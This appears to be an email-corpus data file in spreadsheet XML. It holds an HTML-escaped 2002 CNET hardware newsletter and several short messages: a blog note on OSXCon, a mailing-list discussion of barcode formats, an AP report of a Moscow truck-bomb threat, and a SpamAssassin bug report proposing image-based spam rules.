 				&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPH1eeIpAywvjsK-FdLP4R" &gt;Video Explosion Deluxe&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPzoKkNOFUywq2NRJSBTeR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Software&lt;/font&gt;
 &lt;!-- /software --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- wireless --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzT5OD3HtBzeFOPq1FsnysR" &gt;Sony Ericsson T68&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZkrudNL3XDtZs6swzdON9R" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Wireless&lt;/font&gt;
 &lt;!-- /wireless --&gt;				
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				 &lt;br&gt;
 				&lt;!-- /EDITORS' CHOICE --&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;
 	&lt;form method=get action="http://www.search.com/redirect"&gt;
 		&lt;tr valign=top&gt;&lt;td&gt;&lt;font size="-1" face="arial,helvetica,sans-serif"&gt;
 			&lt;img src="http://a.r.tv.com/cnet.1d/i/se/dispatch_hd.gif" width=150 height=20 alt="CNET Search.com" border=0&gt;&lt;br&gt;
 			&lt;img src="http://cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 			&lt;input type=text name=q size=17 value=""&gt;&lt;br&gt;
 			&lt;select name=target class=frmel&gt;
 			&lt;!-- &lt;option value="http://hardware.search.com/search?tag=ex.computers.dispatch.srch.cnet"&gt;Computers --&gt;
  				&lt;option value="http://computers.cnet.com/hardware/search/1,10121,0-1016-401-0,00.html?tag=srch&amp;qt=%%q%%&amp;cn=&amp;ca=1016"&gt;Computers
  				&lt;option value="http://cnet.search.com/search?tag=ex.computers.dispatch.srch.cnet"&gt;All CNET
  				&lt;option value="http://www.search.com/search?tag=ex.computers.dispatch.srch.web"&gt;The Web
 			&lt;/select&gt; 
 			&lt;input type=submit value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;/form&gt;
 &lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;   
 	&lt;/td&gt;&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/dp/dd_c.gif"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&lt;/td&gt;&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 			&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 				&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;!-- promo section --&gt;
 		&lt;tr valign=top&gt;&lt;td width=1 bgcolor="#000000"&gt;
 			&lt;img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valign=top&gt;&lt;td width=10&gt;
 					&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td width=412&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3"&gt;&lt;br&gt;
 					&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 17, 2002&lt;/font&gt;&lt;br&gt;
 					&lt;img src="http://home.cnet.com/b.gif" width="1" height="3"&gt;&lt;br&gt;
 					&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 						&lt;tr valign=top&gt;&lt;td width=76 align=right&gt;
 							&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hw/66x86_TOMD.gif" width="66" height="86" border="0"&gt;&lt;br&gt;
 							&lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
 							--Tom Dunlap&lt;br&gt;
 							Senior editor&lt;br&gt;
 							CNET Hardware&lt;br&gt;&lt;/font&gt;
 							&lt;/td&gt;&lt;td width=10&gt;&lt;/td&gt;
 							&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 								&lt;font color="#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 								&lt;font size="-1"&gt;
 One of the hot trends in notebooks is squeezing desktop processors,
 not mobile CPUs, into laptops. Actually, the trend has been around
 for a while, but the bigger vendors used to pooh-pooh these
 efforts. (Intel was never too crazy about the idea, either.) Now,
 it's a bona fide movement, and the latest 9.6-pound desktop-
 replacement system from Toshiba takes this trend to new heights.
 But questions abound: Are the extra pounds worth it? Do these 
 things really get so hot that you can press pants with them? 
 Executive Editor John Morris &lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7py5L3iJCGpAEVgnfqGsJuR" &gt;sorts it out for you&lt;/a&gt;. 
 &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 					&lt;/td&gt;&lt;td width=8&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table cellpadding=0 width="100%"&gt;
   				&lt;tr&gt;&lt;td align=center&gt;
       				&lt;table width="100%" cellspacing="0" cellpadding="0" border="0"&gt;
 	    				&lt;tr&gt;&lt;td align="center" colspan="5"&gt;
 							&lt;img src="http://home.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10" alt="advertisement"&gt;&lt;/td&gt;&lt;/tr&gt;
         				&lt;tr valign="middle"&gt;&lt;td colspan="5" bgcolor="#999999" height="15"&gt;
 							&lt;font face="verdana,geneva,helvetica" size="-2" color="#ffffff"&gt;&lt;b&gt;click  here for details&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 						&lt;tr valign="middle" align="center" bgcolor="#eeeeee"&gt;
 		  					&lt;td height="35"&gt; &lt;/td&gt;
 		  					&lt;FORM action=http://computers.cnet.com/cgi-acc/clickthru.acc method=get target=_top&gt;
 		  					&lt;td width="50%" align="center"&gt;
 		  						&lt;INPUT name=url type=hidden value=http://home.cnet.com/go/to?tag=dd.co.wht.aislebut.dktp-dell&amp;destUrl=http%3a%2f%2fhome.cnet.com%2fhardware%2fsearch%2fresults%2f1,11277,0-1017-403-0,00.html%3fqt%3ddell%2bhome&gt;
 		  						&lt;INPUT type=submit value="     Dell     "&gt;&lt;/td&gt;&lt;/form&gt;
 		  						&lt;FORM action=http://computers.cnet.com/cgi-acc/clickthru.acc method=get target=_top&gt;
 		  					&lt;td width="50%" align="center"&gt;
 		  						&lt;INPUT name=url type=hidden value=http://home.cnet.com/go/to?tag=dd.co.wht.aislebut.dktp-gateway&amp;destUrl=http%3a%2f%2fhome.cnet.com%2fhardware%2fsearch%2fresults%2f1,11277,0-1017-403-0,00.html%3fqt%3dgateway&gt; 
 		  						&lt;INPUT type=submit value=" Gateway "&gt;&lt;/td&gt;&lt;/form&gt;
 							&lt;td&gt;&lt;/td&gt;
 						&lt;/tr&gt;
 	  				&lt;/table&gt;    
 					&lt;/td&gt;
   				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;br&gt;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href="http://clickthru.online.com/Click?q=d2-THo_QULw1KYQAew3Gl22vbAOyesR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/050202chipart.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXoN8JRKwVqS8CMB0qvsZR" &gt;&lt;b&gt;Intel's new insides&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;The i845 chipset's many flavors are faster, better, and a lot more confusing. Read before you shop.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1rZJyeaO_Iti64Q9t8uR" &gt;Gateway 300 series keeps PCs simple
 &lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYryNcDy-pEvKY-qkCKsR" &gt;Modernize your motherboard&lt;/a&gt;&lt;br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popular&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="5" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;Desktops&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	1. &lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2G9eJMZsSkMRUVolYrBZR" &gt;Gateway 700XL&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIs1bVpNELY0VXXjhrHNHdR" &gt;Dell Dimension 4000 series&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPxz__HG3Jlh9GpMUHM3rR" &gt;HP Pavilion 950&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWIA9TfGqksPj9y-DzbW-iR" &gt;Alienware Aurora DDR&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIw9gkoTgbDr4q1O7VpJlR" &gt;Falcon Northwest Mach V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdqUjw6eLVb8HYULuonX9R" &gt;See all most popular desktops&lt;/a&gt;&lt;/b&gt;&lt;br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
 &lt;!-- /Leads Module --&gt;
 			&lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;
 				&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 					&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/wr/sub_rev.gif" alt="Reviews" width="125" height="19" border="0"&gt;&lt;br&gt;
 					&lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- item 1 --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTaQ0HQGksIC1b2OB8OEuR" &gt;Are bigger notebooks better?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The latest desktop-replacement notebook from Toshiba takes the
 desktop-chip trend to new heights. But Toshiba's not alone. Keep
 up with the latest in Executive Editor John Morris's Digital
 Domain column. 
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZB7wY6FZCRaT-Dc13yE_FR" &gt;Read the column&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;!-- item 2 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWF8zzz901I7c7YuNDxuyC9R" &gt;Desktop chip turbocharges WinBook J4&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 WinBook's big and heavy J4 uses a desktop Pentium 4 and leaves
 mobile P4-M notebooks in the dust. (It's a trend; see item No. 1.)
 Click here for the full review of this speedy new WinBook.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyw2tG_OC5jnbcumX6cvbuR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO2iIMpUqFtvDA4oSMpoLsR" &gt;&lt;b&gt;Configure &amp;amp; price&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;!-- center1 --&gt;
 &lt;!-- /center1 --&gt;
 &lt;!-- item 3 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjk58ZIDgrsUb9HGRJ1bfZR" &gt;Apple eMac not just for education anymore&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Ideally suited to students living in small spaces and home users
 with basic needs, the eMac is an attractive, adequately speedy,
 and easy-to-use PC without the flat-panel iMac's relatively high
 price. Wondering whether to go CRT or flat-panel? Read our review.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=24-8DdMIcz6Cx7CRIwgeUef92iqrwdR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6kxhAFUfCGLs-y39w-_cR" &gt;&lt;b&gt;Configure &amp;amp; price&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;&lt;br&gt;
 &lt;!-- item 4 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZAScVxi6pIKlsTn8N_JjiR" &gt;Acer TravelMate 632XCi: P4 to the people&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Acer's new TravelMate delivers just what you'd expect from a
 mainstream notebook. It's not the fastest mobile Pentium 4-M
 notebook we've tested, but it offers a solid set of features and
 long battery life in an attractive, relatively low-cost package.
 Find out more here.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWSg0_Qyf6g_9-hwkp_WElR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBf9LNNXiWmFz_e0CvgparR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;&lt;br&gt;
 &lt;!-- item 5 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KT6XMy6PDuYWD0V_WyRR" &gt;Faster RAM boosts Atlas Micro GS 9800&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Thank Sis Technology (not foot-dragging Intel) for the 645DX
 chipset that lets the GS 9800 pair 333MHz DDR SDRAM with a Pentium 4
 processor--a combination that ekes out a bit more performance for
 the price. For more on this affordable system for gamers and
 enthusiasts, read our review.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1qYOxGr1fQffN5r5ls4FR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUw-0p2xIGlq9S_p8qkEi9R" &gt;&lt;b&gt;Configure &amp;amp; price&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;&lt;br&gt;
 &lt;!-- item 6 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsK3XOA9i2FjAi_TOlRfXuR" &gt;Samsung's bright, cheap, 19-inch CRT&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The SyncMaster 950b has its bright points. This 19-inch CRT offers
 decent image quality, it doesn't cost a bundle, and a special
 highlight zone lets you select an area of your screen and ratchet
 up the brightness, making it good for images or video. For more on
 this bright idea, read our review.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzYRmRJKDENBEZdihv9KsR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzfS0A8WolrZIGiR6ImOZR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;&lt;br&gt;
 &lt;p&gt;&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
         &lt;tr valign=bottom&gt;&lt;td width=75&gt;
 			&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hw/HEAD_MESSAGEbrds.gif" width="175" height="19" border="0" alt="CNET Message Boards"&gt;&lt;br&gt;&lt;/td&gt;
             &lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#666666"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;&lt;td bgcolor="#CCCCCC" colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=8&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8H3vm8KawWDjP2qJ13b4dR" &gt;CNET Message Boards: Computer Help is here&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 Stumped by computer hardware and software problems? Never fear;
 check out the CNET Message Boards, where quick help is just a post
 away. Join us in the Computer Help forums.
 &lt;!--Horizontal Brick--&gt;
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://www.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://www.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;&lt;BR&gt;
 &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%25"&gt;&lt;TR vAlign=top&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;UL&gt;
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdDDZiwGf7oQqYoj1cTQ4cR" &gt;Live tech help: submit your questions now&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzF4eGFWRVQ93KjZ6eJcnZR" &gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbkQEDdZAu7hgvo2AKenR" &gt;Find a job you love, with more than 1 million postings&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLjv_V9YFN4JYndFK-AWlrR" &gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBPTfRMqTR1okYP2r70U6iR" &gt;May Editors' Choice award: Pioneer's HTS-910DV&lt;/A&gt; 
 &lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Horizontal Brick--&gt;
 		&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 		 &lt;br&gt;&lt;!-- End search box --&gt;
     	&lt;/td&gt;&lt;/tr&gt;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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;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HREF='http://clickthru.online.com/Click?q=3d-oiuNzKz86TVd4S9twloEZUu5XMk3DdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6Z4KKcAijHpx8lOheMnlR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPH1eeI-LywvjsK-FdLP4R"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href="http://clickthru.online.com/Click?q=7d-FFEqIDLPzoKkXOlUywq2NRJSBTeR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzT5OD3htKzeFOPq1FsnysR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwVKfi9xELF5vLk7KCgFZR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6BdHyD-kFVmobF8XEDxwcdR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpErJt1fbd110-kl0aSxkZcR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwyqDKAWzrrXGugH6NQYvURR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e405&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=fc-Wpom-6wlaul04ARltpVvA0fT5sRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Not Many OS X Conference Blogs
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000219.html
 Date: 2002-10-02T23:30:23-08:00
 As noted in the inluminent weblog there don't seem to be many bloggers at 
 OSXCon. At least they're not blogging. That's rather disappointing. They were 
 strong at OSCON and the Emerging Technologies Conference (damn, I wish I had 
 the foresight...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: NYTimes.com Article: Bigger Bar Code Inches Up on Retailers
</t>
  </si>
  <si>
    <t xml:space="preserve">Rohit forwards from the NYT:
 &gt; Bigger Bar Code Inches Up on Retailers
 &gt; August 12, 2002
 &gt; By KATE MURPHY 
 I can't imagine why they're inching forward through 
 13- and then 14- digit extensions; seems they should
 just leap ahead to something with real headroom, say
 40-digit numbers (128 bits or more). 
 How hard can it be to widen the glyph area and 
 narrow the bars? The sensors have got to be tens
 or even hundreds of times more accurate/robust 
 than when barcodes first took off.
 One segment of the article along these lines:
 &gt; But moving to 13 digits may not be enough. The Universal
 &gt; Code Council and EAN International, which formed an
 &gt; alliance in 1996, strongly advise manufacturers and
 &gt; retailers to go a step further and prepare their systems to
 &gt; accommodate a 14-digit code. That is the length of a newly
 &gt; patented bar code that takes up less space. Its reduced
 &gt; size means that it can be affixed to small items like loose
 &gt; produce, and the extra digits let a retailer keep track of
 &gt; additional data like batch and lot numbers. 
 A newly *patented* bar code, that merely fits 14 digits
 into less space? I sure hope there's more to this
 "invention" than "more lines, and narrower". 
 They might as well go 2-D to fit in lots of extra bits,
 which could also ease the transition to the capacity 
 radio-transponder tags may offer.
 A bunch of info on different barcode standards, including
 2-D variants, with examples is at:
 http://www.makebarcode.com/specs/speclist.html
 Something very much like a 2-D barcode is Xerox "Dataglyphs":
 http://www.parc.com/solutions/dataglyphs/
 - Gordon
 ____________________   
 Gordon Mohr &lt;gojomo@ . . . At Bitzi, people cooperate to identify, rate,
 bitzi.com&gt; Bitzi CTO . . . describe and discover files of every kind. 
 _ http://bitzi.com _ . . . Bitzi knows bits -- because you teach it!
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Moscow bomber
</t>
  </si>
  <si>
    <t xml:space="preserve">Man Threatens Explosion In Moscow 
 Thursday August 22, 2002 1:40 PM
 MOSCOW (AP) - Security officers on Thursday seized an unidentified man who
 said he was armed with explosives and threatened to blow up his truck in
 front of Russia's Federal Security Services headquarters in Moscow, NTV
 television reported.
 The officers seized an automatic rifle the man was carrying, then the man
 got out of the truck and was taken into custody, NTV said. No other details
 were immediately available.
 The man had demanded talks with high government officials, the Interfax and
 ITAR-Tass news agencies said. Ekho Moskvy radio reported that he wanted to
 talk with Russian President Vladimir Putin.
 Police and security forces rushed to the Security Service building, within
 blocks of the Kremlin, Red Square and the Bolshoi Ballet, and surrounded the
 man, who claimed to have one and a half tons of explosives, the news
 agencies said. Negotiations continued for about one and a half hours outside
 the building, ITAR-Tass and Interfax reported, citing witnesses.
 The man later drove away from the building, under police escort, and drove
 to a street near Moscow's Olympic Penta Hotel, where authorities held
 further negotiations with him, the Moscow police press service said. The
 move appeared to be an attempt by security services to get him to a more
 secure location. 
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 1053] New: IMG tag based rules
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1053
            Summary: IMG tag based rules
            Product: Spamassassin
            Version: unspecified
           Platform: Other
         OS/Version: other
             Status: NEW
           Severity: enhancement
           Priority: P2
          Component: Eval Tests
         AssignedTo: spamassassin-devel@example.sourceforge.net
         ReportedBy: matt@nightrealms.com
 Inspired by complaints about all-image or mostly-image spam that's
 getting by SA, I've cooked up three sets of rules that analyze the use
 of IMG tags in HTML: one that looks at the total area of all of the
 images in the message (T_HTML_IMAGE_AREA*), one that looks at the
 total number of images in the message (T_HTML_NUM_IMGS*), and one that
 looks at the longest total run of consecutive images
 (T_HTML_CONSEC_IMG*).
 ===============
 The total area of all images is rather easy to compute: inside of
 HTML::html_tests(), if an IMG tag has both the width and height
 properties, then multiply them together and add the result to the
 running total.
 OVERALL%   SPAM% NONSPAM%     S/O    RANK   SCORE  NAME
   15113     4797    10316    0.32    0.00    0.00  (all messages)
 100.000   31.741   68.259    0.32    0.00    0.00  (all messages as %)
   0.635    2.001    0.000    1.00    0.81    0.01  T_HTML_IMAGE_AREA14
   0.417    1.313    0.000    1.00    0.78    0.01  T_HTML_IMAGE_AREA15
   0.331    1.042    0.000    1.00    0.76    0.01  T_HTML_IMAGE_AREA07
   0.245    0.771    0.000    1.00    0.74    0.01  T_HTML_IMAGE_AREA10
   0.238    0.750    0.000    1.00    0.74    0.01  T_HTML_IMAGE_AREA02
   0.225    0.709    0.000    1.00    0.74    0.01  T_HTML_IMAGE_AREA16
